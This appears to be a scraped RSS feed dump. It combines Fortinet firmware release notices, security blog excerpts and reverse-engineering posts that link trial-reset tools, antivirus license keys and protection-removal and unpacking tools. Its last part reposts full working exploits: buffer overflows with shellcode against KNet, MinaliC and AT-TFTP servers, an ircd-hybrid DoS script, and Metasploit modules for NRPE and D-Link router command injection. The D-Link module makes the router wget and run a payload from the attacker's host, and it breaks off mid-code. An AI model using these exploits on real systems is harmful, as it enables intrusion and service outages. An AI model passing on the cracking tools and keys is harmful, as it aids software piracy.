http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 4.3.13 B0664 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_800, FGT_3600, FGT_300A, * FGT_100A, FGT_200A, FGT_400A, * FGT_500A, FGT_800F, FGT_5001FA2, * FGT_1000A, FGT_5001, FGT_5005, * FGT_3810A, FGT_50B, FWF_50B, * FGT_3016B, FGT_310B, FGT_30B, * FGT_5005FA2, FGT_224B, FWF_60B, * FGT_60B, FGT_1000AFA2, FGT_1000A_LENC, * FGT_3600A, FGT_5002FB2, FGT_5001A, * FGT_620B, FOC_5001, FOC_5005FA2, * FOC_3810A, FGT_110C, FOC_WF_60B, * FGT_111C, FGT_51B, FGT_80C, * FWF_80CM, FGT_311B, FWF_30B, * FGT_82C, FWF_81CM, FGT_ONE, * FGT_1240B, FGT_3950B, FGT_3951B, * FOC_60B, FOC_5001A, FOC_5001FA2, * FGT_80CM, FGT_200B, FGT_200B_POE, * FGT_310B_DC, FGT_620B_DC, FWF_60C, * FOC_3950B, FOC_3951B, FGT_3040B, * FGT_621B, FGT_3140B, FGT_5001B, * FGT_60C, FGT_VM32, FK_3810A, * FK_5001A, FK_3950B, FK_3951B, * FSW_5203B, FWF_60CX_A, FWF_60CM, * FGT_300C, FOC_80C, FOC_5001B, * FK_5001B, FGT_VM64, FGT_600C, * FGT_1000C, FGT_40C, FWF_40C, * FGT_20C, FWF_20C, FGT_VM64_XEN, * FGT_100D, FGT_3240C, FGT_3140B_LENC, * FGT_3140B_DC, FGT_3040B_LENC, FGT_3040B_DC, * FGT_800C, FGT_60C_POE, FGT_20C_ADSL_A, * FWF_20C_ADSL_A

==> FortiClient Mac 5.0.3

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient Mac 5.0.3 B0105 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * MacOS

==> FortiClient 5.0.3

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient 5.0.3 B0246 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Windows_x64, Windows_x86

==> FortiSwitchOS 2.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiSwitchOS 2.0.0 B0005 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FSW_324B_POE, FSW_348B

==> FortiAuthenticator 2.2.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiAuthenticator 2.2.0 B0205 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAC_200D, FAC_400C, FAC_1000C, * FAC_3000B, FAC_VM

==> FortiWeb 4.4.7

http://pub.kb.fortinet.com/rss/firmware.xml FortiWeb 4.4.7 B0689 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FWB_400B, FWB_400C, FWB_1000B, * FWB_1000C, FWB_3000C, FWB_3000CFSX, * FWB_4000C, FWB_VM-64bit, FWB_4000D,

==> FortiAnalyzer 4.3.7

http://pub.kb.fortinet.com/rss/firmware.xml FortiAnalyzer 4.3.7 B0705 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FLG_100B, FLG_100C, FLG_400B, * FLG_800, FLG_800B, FLG_1000B, * FLG_1000C, FLG_2000, FLG_2000A, * FLG_2000B, FLG_4000, FLG_4000A, * FLG_4000B, FLG_VM32, FLG_400C, * FLG_VM64, FLG_200D

==> FortiCache 2.2.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiCache 2.2.2 B0226 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FCH1KC, FCH3KC, FCH4HC,

==> FortiAnalyzer 5.0.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiAnalyzer 5.0.2 B0151 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAZ_1000B, FAZ_1000C, FAZ_100C, * FAZ_2000A, FAZ_2000B, FAZ_4000A, * FAZ_4000B, FAZ_400B, FAZ_400C, * FAZ_VM32, FAZ_VM64, FAZ_200D,

==> FortiManager 5.0.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiManager 5.0.2 B0151 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FMG_1000C, FMG_100C, FMG_3000B, * FMG_3000C, FMG_400B, FMG_400C, * FMG_5001A, FMG_VM32, FMG_VM64, * FMG_200D

==> FortiAP 5.0.3

http://pub.kb.fortinet.com/rss/firmware.xml FortiAP 5.0.3 B0032 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAP_210B, FAP_220B, FAP_221B, * FAP_222B, FAP_112B, FAP_320B, * FAP_223B, FAP_11C, FAP_14C,

==> FortiOS 5.0.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 5.0.2 B0179 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_60D, FWF_60D

==> FortiOS 5.0.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 5.0.2 B0179 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_3600C

==> FortiClient Mac 5.0.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient Mac 5.0.2 B0098 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * MacOS

==> FortiClient 5.0.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiClient 5.0.2 B0225 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * Windows_x64, Windows_x86

==> FortiAP 5.0.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiAP 5.0.2 B0031 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FAP_210B, FAP_220B, FAP_221B, * FAP_222B, FAP_112B, FAP_320B, * FAP_223B, FAP_11C, FAP_14C,

==> FortiOS 5.0.2

http://pub.kb.fortinet.com/rss/firmware.xml FortiOS 5.0.2 B0179 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FGT_40C, FGT_60C, FGT_80C, * FGT_80CM, FGT_110C, FGT_111C, * FGT_200B, FGT_200B_POE, FGT_300C, * FGT_310B, FGT_311B, FGT_620B, * FGT_620B_DC, FGT_621B, FGT_1240B, * FGT_3016B, FGT_3040B, FGT_3140B, * FGT_3810A, FGT_3950B, FGT_3951B, * FGT_5001A, FGT_5001B, FGT_VM32, * FGT_VM64, FWF_40C, FWF_60C, * FWF_60CM, FWF_60CX_A, FWF_80CM, * FWF_81CM, FGT_310B_DC, FGT_3040B_DC, * FGT_3040B_LENC, FGT_3140B_LENC, FGT_3140B_DC, * FGT_800C, FGT_1000C, FGT_100D, * FGT_5101C, FGT_600C, FSW_5203B, * FWF_20C, FGT_20C, FGT_60C_POE, * FGT_20C_ADSL_A, FWF_20C_ADSL_A, FGT_3240C, * FGT_5001C

==> FortiExploreriOS 1.0.4

http://pub.kb.fortinet.com/rss/firmware.xml FortiExploreriOS 1.0.4 B0118 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * iOS

==> FortiVoice 7.3.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiVoice 7.3.0 B002 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * FVC_40, FVC_70, FVC_100,

==> Keeping skills current in a changing world

http://rdist.root.org/feed/ I came across this article on how older tech workers are having trouble finding work. I’m sure many others have written about whether this is true, whose fault it is, and whether H1B visas should be increased or not. I haven’t done the research so I can’t comment on such things, but I do know […]

==> History of memory corruption vulnerabilities and exploits

http://rdist.root.org/feed/ I came across a great paper, “Memory Errors: The Past, the Present, and the Future” by van der Veen et al. The authors cover the history of memory corruption errors as well as exploitation and countermeasures. I think there are a number of interesting conclusions to draw from it. It seems that the number of […]

==> Has HTML5 made us more secure?

http://rdist.root.org/feed/ Brad Hill recently wrote an article claiming that HTML5 has made us more secure, not less. His essential claim is that over the last 10 years, browsers have become more secure. He compares IE6, ActiveX, and Flash in 2002 (when he started in infosec) with HTML5 in order to make this point. While I think […]

==> Toggl time-tracking service failures

http://rdist.root.org/feed/ A while ago, we investigated using various time-tracking services. Making this quick and easy for employees is helpful in a consulting company. Our experience with one service should serve as a cautionary note for web 2.0 companies that want to sell to businesses. Time tracking is a service that seems both boring and easy to […]

==> Cyber-weapon authors catch up on blog reading

http://rdist.root.org/feed/ One of the more popular posts on this blog was the one pointing out how Stuxnet was unsophisticated. Its use of traditional malware methods and lack of protection for the payload indicated that the authors were either “Team B” or in a big hurry. The post was intended to counteract the breathless praise in the […]

==> RSA repeats earlier claims, but louder

http://rdist.root.org/feed/ Sam Curry of RSA was nice enough to respond to my post. Here’s a few points that jumped out at me from what he wrote: RSA is in the process of fixing the downgrade attack that allows an attacker to choose PKCS #1 v1.5, even if the key was generated by a user who selected […]

==> OllyDbg 2.00.01 (Final)

http://reversengineering.wordpress.com/feed/ OllyDbg 2.0 is a 32-bit assembler-level analyzing Debugger with intuitive interface. It is especially useful if source code is not available or when you experience problems with your compiler. Requirements. Developed and tested mainly under Windows 2000 and Windows XP, but should work under any Windows version: 95, 98, ME, NT, 2000, XP, 2003 Server, [...]

==> PROTECTiON iD 6.4.0

http://reversengineering.wordpress.com/feed/ Features: - detection of every major PC ISO Game / Application protection - currently covers 475 detections, including win32/64 exe protectors & packers, .net protectors, dongles, licenses & installers - sector scanning CDs / DVDs for Copy Protections - files / folders can simply be drag & dropped into pid - strong scanning routines allowing [...]

==> StrongOD 0.3.4.639

http://reversengineering.wordpress.com/feed/ Make your OllyDbg Strong! This plug-in provides three kinds of ways to initiate the process: 1, Normal – And the same manner as the original start, the STARTUPINFO inside unclean data 2, CreateAsUser – User with a mandate to initiate the process of the user, so that the process running under the purview of the [...]

==> Broken links! Links that do not work

http://reversengineering.wordpress.com/feed/ Hi dear friends, tell me about broken links in this post. I will find it on my system and after that I will try [...]

==> Trial Reset 4 Final

http://reversengineering.wordpress.com/feed/ Trial Reset 4 Final Tnx fly to his programmer http://rapidshare.com/files/409095074/Trial-Reset40Final.zip http://reversengineering.files.wordpress.com/2010/07/trial-reset40final-zip.jpg you know what to do;) Filed under: OTHER, TOOLS

==> The newest NOD32 keys with MVGM NOD32 Licence v1.0

http://reversengineering.wordpress.com/feed/ HI The newest NOD32 keys with MVGM NOD32 Licence v1.0 NOD32 [...]

==> TrialReset 4.0 Final (Public)

http://reversengineering.wordpress.com/feed/ Hi to all, I am here again. Thank you for your support. A small program for removing the trial of apps. Works with all the widespread systems of protection. The interface is very simple: [...]

==> ODDragAttach 1.1

http://reversengineering.wordpress.com/feed/ Author Exile Description Choice is, it will add the window corresponding to the process of src and bin. Window, the process of selection, OD automatically minimize the window, select the target window, then maximize the window, OD. Note: Some versions of the OD program may cover an open button, can be changed according [...]

==> Attach Extended 0.1

http://reversengineering.wordpress.com/feed/ This is a really small plugin that I have written for improving attach feature of OllyDbg. With this plugin, you can attach to process by identifying its PID directly, not only selecting process list. In addition, you can find PID of process by dragging a small cursor on each window (This can be used on [...]

==> Mapimp 0.4

http://reversengineering.wordpress.com/feed/ Author takerZ Description This is an open source OllyDbg plugin which will help you to import map files exported by IDA or Dede. There are many plugins using which you can perform similar actions, but mapimp: - Recognizes debugged file segments and applies names correctly - Has an option to overwrite or skip [...]

==> Obsidium 1.4.x.x OEP Finder + IAT Repair v0.1

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/7203.a79ca10d2342f1b32333add72/Obsidium_1.4.x.x_OEP_Finder___IAT_Repair_v0.1.txt.html Author Pavka Posted in Scripts, TOOLS

==> MUltimate Assembler 1.2

http://reversengineering.wordpress.com/feed/ Author RaMMicHaeL A multi-line (dis)assembler tool, perfect for writing code caves. It supports: - labels and data (C-style string) - external jumps and calls. http://letitbit.net/download/6671.c63ed09074b57c49b4cd2067e/MUltimate_Assembler_v1.2.rar.html Posted in OLLY'S PLUGINS, TOOLS

==> VMProtect 1.7 – 1.8 OEP Finder + Unpack Helper v1.0

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/2516.25addf1167522eb8602b67146/VMProtect_1.7___1.8_OEP_Finder___Unpack_Helper_v1.0.txt.html by LCF-AT Posted in Scripts, TOOLS

==> CodeDoctor 0.90

http://reversengineering.wordpress.com/feed/ Functions: 1) Deobfuscate Select instructions in disasm window and execute this command. It will try to clear the code from junk instructions. Example: Original: 00874372 57 PUSH EDI 00874373 BF 352AAF6A MOV EDI,6AAF2A35 00874378 81E7 0D152A41 AND EDI,412A150D 0087437E 81F7 01002A40 XOR EDI,402A0001 00874384 01FB ADD EBX,EDI 00874386 5F POP EDI Deobfuscated: 00874372 83C3 04 [...]

==> Themida + WinLicense 1.1.0.0 – 2.1.0.0 Dumper + IAT Repair + CodeEncrypt Repair v2.6.0

http://reversengineering.wordpress.com/feed/ by Quosego http://letitbit.net/download/5120.c5ff8c01bf87b5594de7f4fbc/Themida___WinLicense_1.1.0.0___2.1.0.0_Dumper___IAT_Repair___CodeEncrypt_Repair_v2.6.0.txt.html Posted in Scripts, TOOLS

==> Scripad 1.0 + ODBGScript 1.77.3

http://reversengineering.wordpress.com/feed/ ODbgScript is a plugin for OllyDbg, which is, in our opinion, the best application-mode debugger out there. One of the best features of this debugger is the plugin architecture which allows users to extend its functionality. ODbgScript is a plugin meant to let you automate OllyDbg by writing scripts in an assembly-like language. Many tasks [...]

==> StrongOD 0.2.6.415

http://reversengineering.wordpress.com/feed/ This will be a separate download of StrongOD as of version 0.2.4.350 because – as strange as it sounds – the developer has protected it! This plugin will now require a key for it to run and be used. You can obtain a valid key by emailing: StrongODsafengine.com http://letitbit.net/download/9563.9f5459d00eca80b4993740279/StrongOD_v0.2.6.415.rar.html Posted in OLLY'S PLUGINS, TOOLS

==> PDF Protection Remover 3.0

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/8140.813d385e39b7bcbb34ccc58af/PDF_Protection_Remover_3.0___Patch_DJiNN.rar.html pass :www.2baksa.net Posted in TOOLS, Uncategorized

==> HOlly 0.2 Build 81

http://reversengineering.wordpress.com/feed/ This is my OllyDbg mod named HOlly. I will be constantly adding features as I require them or they are requested. Currently it only has a multiline assembler that needs some work but I would like some input. So if I could get some input on the following that would be great. http://letitbit.net/download/3997.d3730400452d29f3a615da1f7/HOlly_v0.2_Build_81.rar.html Posted in [...]

==> Themida+WL1.1.0.0-2.1.0.0Dumper+IAT Repair+CodeEncryptRepair_v2.6.0

http://reversengineering.wordpress.com/feed/ Themida+WL1.1.0.0-2.1.0.0Dumper+IAT Repair+CodeEncryptRepair_v2.6.0 By [SND]quosego Hi all, It’s time to make a final stand. Oreans it’s your turn now. This package includes the following; WL.&.TM.VM.dumper.&.IAT.CodeEnc.Fixer.v2.6.0-SnD A script to unpack all known versions of Winlicense and Themida using any options. The script will unpack all known Themida and Winlicense applications using virtual machine antidump on Windows XP. [...]

==> KNet Web Server 1.04b - Stack Corruption BoF Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss #!/usr/bin/perl # KNet Web Server Stack corruption BoF PoC # Written by Wireghoul - http://www.justanotherhacker.com # Date: 2013/04/11 # Version: 1.04b # Tested on: WinXP SP3 use IO::Socket::INET; $host = shift; $port = shift; print "KNet Web Server stack corruption BoF PoC - Wireghoul - http://www.justanotherhacker.com\n"; die "Usage $0 <host> <port>\n" unless $host && $port; $sock = IO::Socket::INET->new("$host:$port") or die "Unable to connect to $host:$port\n"; # Shellcode for calc.exe $shellcode= [...]; $dist=1003-length($shellcode); $payload = "\x90"x$dist; # Distance to overwrite EIP $payload.=$shellcode; $payload.="\x90" x 8; #Spacer between EIP and shellcode $payload.= "\x53\x93\x42\x7e"; #Overwrite EIP with jmp esp $payload.="\x90\x90\x90\x90\xE9\xF4\xFC\xFF\xFF"; #stack padding + BP + Near jmp-300 $payload.=" / HTTP/1.0\r\n\r\n"; # Needs to be a valid HTTP request print $sock $payload;

==> AT-TFTP Server 2.0 - Stack Based Buffer Overflow DoS Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss # Exploit Title: AT-TFTP 2.0 long filename stack based buffer overflow - DOS # Date: 12.04.2013 # Exploit Author: xis_one@STM Solutions # Vendor Homepage: http://www.alliedtelesis.com/ # Software Link: http://alliedtelesis.custhelp.com/cgi-bin/alliedtelesis.cfg/php/enduser/std_adp.php?p_faqid=1081&p_created=981539150&p_topview=1 # Version: 2.0 # Tested on: Windows XP SP3 # # From 1.9 Remote Exec BOF discovered in 2006 by liuqx@nipc.org.cn to 2.0 Remote DOS BOF 2013 - no lesson learned. # Two variants: # # 1. SEH overwrite but no exception handler trigger (cookie on stack?) # 2. Read access violation (non-exploitable?) # # Still we can crash the server remotely. # #!/usr/bin/python import socket import sys host = '192.168.1.32' port = 69 nseh="\xCC\xCC\xCC\xCC" #seh handler overwritten at 261 byte of shellcode but to exception triggered to use it. seh="\x18\x0B\x27" # Breakpoint in no SafeSEH space in Windows XP SP3 payload="\xCC"*257 + nseh + seh + "\x00" + "3137" + "\x00" #payload to get access violation: [...] buffer="\x00\x01"+ payload + "\x06" + "netascii" + "\x00" s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(buffer, (host, port))

==> MinaliC Webserver 2.0.0 - Buffer Overflow Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss #!/usr/bin/env python # Exploit Title: MinaliC Webserver buffer overflow # Date: 12 Apr 2013 # Exploit Author: superkojiman - http://www.techorganic.com # Vendor Homepage: http://minalic.sourceforge.net/ # Version: MinaliC Webserver 2.0.0 # Tested on: Windows XP Pro SP2, English # # Description: # Remote command execution by triggering a buffer overflow in the GET # request. # import socket import struct # 74 bytes calc.exe from http://code.google.com/p/win-exec-calc-shellcode/ shellcode = ( "\x31\xd2\x52\x68\x63\x61\x6c\x63\x89\xe6\x52\x56\x64\x8b\x72" + "\x30\x8b\x76\x0c\x8b\x76\x0c\xad\x8b\x30\x8b\x7e\x18\x8b\x5f" + "\x3c\x8b\x5c\x1f\x78\x8b\x74\x1f\x20\x01\xfe\x8b\x4c\x1f\x24" + "\x01\xf9\x0f\xb7\x2c\x51\x42\xad\x81\x3c\x07\x57\x69\x6e\x45" + "\x75\xf1\x8b\x74\x1f\x1c\x01\xfe\x03\x3c\xae\xff\xd7\xcc" ) # EIP at offset 245 when minalic.exe is in C:\minalic\bin # EBX points directly to the "Host:" value, so we put our shellcode there. # JMP EBX @ 0x7C955B47, NTDLL.DLL, Windows XP Pro SP2 English junk = "\x41" * 245 ret = struct.pack("<I", 0x7C955B47) host = "\x90" * 30 + shellcode + "\x90" * 31 buf = "GET /" + junk + ret + " HTTP/1.1\r\n" + "Host: " + host + "\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.37.132", 8080)) s.send(buf)

==> IRCD-Hybrid 8.0.5 - DoS Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss #!/usr/bin/perl # ircd-hybrid remote denial of service exploit for CVE-2013-0238 # quick and dirty h4x by kingcope # tested against ircd-hybrid-8.0.5 centos6 # please modify below in case of buggy code. # enjoy! use Socket; srand(time()); $exploiting_nick = "hybExpl" . int(rand(10000)); sub connecttoserver() { $bool = "yes"; $iaddr = inet_aton($ircserver) || die("Failed to find host: $ircserver"); $paddr = sockaddr_in($ircport, $iaddr); $proto = getprotobyname('tcp'); socket(SOCK1, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket:$!"); connect(SOCK1, $paddr) || {$bool = "no"}; } sub usage() { print "usage: ircd-hybrid.pl <target> <port>\r\n"; exit; } $| = 1; print "------------------------------------------------------------------\r\nLets have fun!\r\n"; print "------------------------------------------------------------------\r\n"; if (!defined($ARGV[1])) { usage(); } $ircport = $ARGV[1]; $ircserver = $ARGV[0]; print "Connecting to $ircserver on port $ircport...\n"; connecttoserver(); if ($bool eq "no") { print "Connection refused.\r\n"; exit(0); } send(SOCK1,"NICK $exploiting_nick\r\n",0); send(SOCK1,"USER $exploiting_nick \"yahoo.com\" \"eu.hax.net\" :$exploiting_nick\r\n",0); while (<SOCK1>) { $line = $_; print $line; if ((index $line, " 005 ") ne -1) { goto logged_in; } if ((index $line, "PING") ne -1) { substr($line,1,1,"O"); send(SOCK1, $line, 0); } } logged_in: print " ok\r\n"; print "Sending buffers...\r\n"; $channelr = int(rand(10000)); send(SOCK1, "JOIN #h4xchan$channelr\r\n", 0); sleep(1); $k = 0; do { print $_; $k++; $crashnum = -1000009 - $k * 1000; send(SOCK1, "MODE #h4xchan$channelr +b *!*\@127.0.0.1/$crashnum\r\n", 0); } while(<SOCK1>); print "done\r\n";

==> Nagios Remote Plugin Executor Arbitrary Command Execution Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## # require 'msf/core' require 'zlib' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution', 'Description' => %q{ The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands. }, 'Author' => [ 'Rudolph Pereir', # Vulnerability discovery 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module ], 'References' => [ [ 'CVE', '2013-1362' ], [ 'OSVDB', '90582'], [ 'BID', '58142'], [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability'] ], 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Payload' => { 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'perl python ruby bash telnet', # *_perl, *_python and *_ruby work if they are installed } }, 'Targets' => [ [ 'Nagios Remote Plugin Executor prior to 2.14', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 21 2013' )) register_options( [ Opt::RPORT(5666), OptEnum.new('NRPECMD', [ true, "NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg", 'check_procs', ['check_procs', 'check_users', 'check_load', 'check_disk'] ]), # Rex::Socket::Tcp will not work with ADH, see comment with replacement 
connect below OptBool.new('NRPESSL', [ true, "Use NRPE's Anonymous-Diffie-Hellman-variant SSL ", true]) ], self.class) end def send_message(message) packet = [ 2, # packet version 1, # packet type, 1 => query packet 0, # checksum, to be added later 0, # result code, discarded for query packet message, # the command and arguments 0 # padding ] packet[2] = Zlib::crc32(packet.pack("nnNna1024n")) # calculate the checksum begin self.sock.put(packet.pack("nnNna1024n")) #send the packet res = self.sock.get_once # get the response rescue ::EOFError => eof res = "" end return res.unpack("nnNnA1024n")[4] unless res.nil? end def setup @ssl_socket = nil @force_ssl = false super end def exploit if check != Exploit::CheckCode::Vulnerable fail_with(Exploit::Failure::NotFound, "Host does not support plugin command line arguments or is not accepting connections") end stage = "setsid nohup #{payload.encoded} & " stage = Rex::Text.encode_base64(stage) # NRPE will reject queries containing |`&><'\"\\[]{}; but not $() :) command = datastore['NRPECMD'] command << "!" command << "$($(rm -f /tmp/$$)" # Delete the file if it exists # need a way to write to a file without using redirection (>) # cant count on perl being on all linux hosts, use GNU Sed # TODO: Probably a better way to do this, some hosts may not have a /tmp command << "$(cp -f /etc/passwd /tmp/$$)" # populate the file with at least one line of text command << "$(sed 1i#{stage} -i /tmp/$$)" # prepend our stage to the file command << "$(sed q -i /tmp/$$)" # delete the rest of the lines after our stage command << "$(eval $(base64 -d /tmp/$$) )" # decode and execute our stage, base64 is in coreutils right? 
command << "$(kill -9 $$)" # kill check_procs parent (popen'd sh) so that it never executes command << "$(rm -f /tmp/$$))" # clean the file with the stage connect print_status("Sending request...") send_message(command) disconnect end def check print_status("Checking if remote NRPE supports command line arguments") begin # send query asking to run "fake_check" command with command substitution in arguments connect res = send_message("__fake_check!$()") # if nrpe is configured to support arguments and is not patched to add $() to # NASTY_META_CHARS then the service will return: # NRPE: Command '__fake_check' not defined if res =~ /not defined/ return Exploit::CheckCode::Vulnerable end # Otherwise the service will close the connection if it is configured to disable arguments rescue EOFError => eof return Exploit::CheckCode::Safe rescue Errno::ECONNRESET => reset unless datastore['NRPESSL'] or @force_ssl print_status("Retrying with ADH SSL") @force_ssl = true retry end return Exploit::CheckCode::Safe rescue => e return Exploit::CheckCode::Unknown end # TODO: patched version appears to go here return Exploit::CheckCode::Unknown end # NRPE uses unauthenticated Annonymous-Diffie-Hellman # setting the global SSL => true will break as we would be overlaying # an SSLSocket on another SSLSocket which hasnt completed its handshake def connect(global = true, opts={}) self.sock = super(global, opts) if datastore['NRPESSL'] or @force_ssl ctx = OpenSSL::SSL::SSLContext.new("TLSv1") ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE ctx.ciphers = "ADH" @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx) @ssl_socket.connect self.sock.extend(Rex::Socket::SslTcp) self.sock.sslsock = @ssl_socket self.sock.sslctx = ctx end return self.sock end def disconnect @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl super end

==> DLink DIR-645 / DIR-815 diagnostic.php Command Execution Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'DLink DIR-645 / DIR-815 diagnostic.php Command Execution', 'Description' => %q{ Some DLink Routers are vulnerable to OS Command injection in the web interface. On DIR-645 versions prior 1.03 authentication isn't needed to exploit it. On version 1.03 authentication is needed in order to trigger the vulnerability, which has been fixed definitely on version 1.04. Other DLink products, like DIR-300 rev B and DIR-600, are also affected by this vulnerability. Not every device includes wget which we need for deploying our payload. On such devices you could use the cmd generic payload and try to start telnetd or execute other commands. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes. This module has been tested successfully on DIR-645 prior to 1.03, where authentication isn't needed in order to exploit the vulnerability. 
}, 'Author' => [ 'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module 'juan vazquez' # minor help with msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '92144' ], [ 'BID', '58938' ], [ 'EDB', '24926' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-017' ] ], 'DisclosureDate' => 'Mar 05 2013', 'Privileged' => true, 'Platform' => ['linux','unix'], 'Payload' => { 'DisableNops' => true }, 'Targets' => [ [ 'CMD', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ], [ 'Linux mipsel Payload', { 'Arch' => ARCH_MIPSLE, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 1 )) register_options( [ OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]), OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]) ], self.class) end def request(cmd,uri) begin res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', 'vars_post' => { "act" => "ping", "dst" => "` #{cmd}`" } }) return res rescue ::Rex::ConnectionError vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") return nil end end def exploit downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8)) uri = '/diagnostic.php' if target.name =~ /CMD/ if not (datastore['CMD']) fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") end cmd = payload.encoded res = request(cmd,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state") return end #thx to Juan for his awesome work on the mipsel elf support @pl = generate_payload_exe @elf_sent = false # # start our server # resource_uri = '/' + downfile if (datastore['DOWNHOST']) service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri else 
#do not use SSL if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end #we use SRVHOST as download IP for the coming wget command. #SRVHOST needs a real IP address of our download host if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") srv_host = Rex::Socket.source_address(rhost) else srv_host = datastore['SRVHOST'] end service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) datastore['SSL'] = true if ssl_restore end # # download payload # print_status("#{rhost}:#{rport} - Asking the DLink device to download #{service_url}") #this filename is used to store the payload on the device filename = rand_text_alpha_lower(8) #not working if we send all command together -> lets take three requests cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}" res = request(cmd,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end # wait for payload download if (datastore['DOWNHOST']) print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Dlink device to download the payload") select(nil, nil, nil, datastore['HTTP_DELAY']) else wait_linux_payload end register_file_for_cleanup("/tmp/#{filename}") # # chmod # cmd = "chmod 777 /tmp/#{filename}" print_status("#{rhost}:#{rport} - Asking the Dlink device to chmod #{downfile}") res = request(cmd,uri) if (!res) fail_with(Exploit::Failure::Unknown, 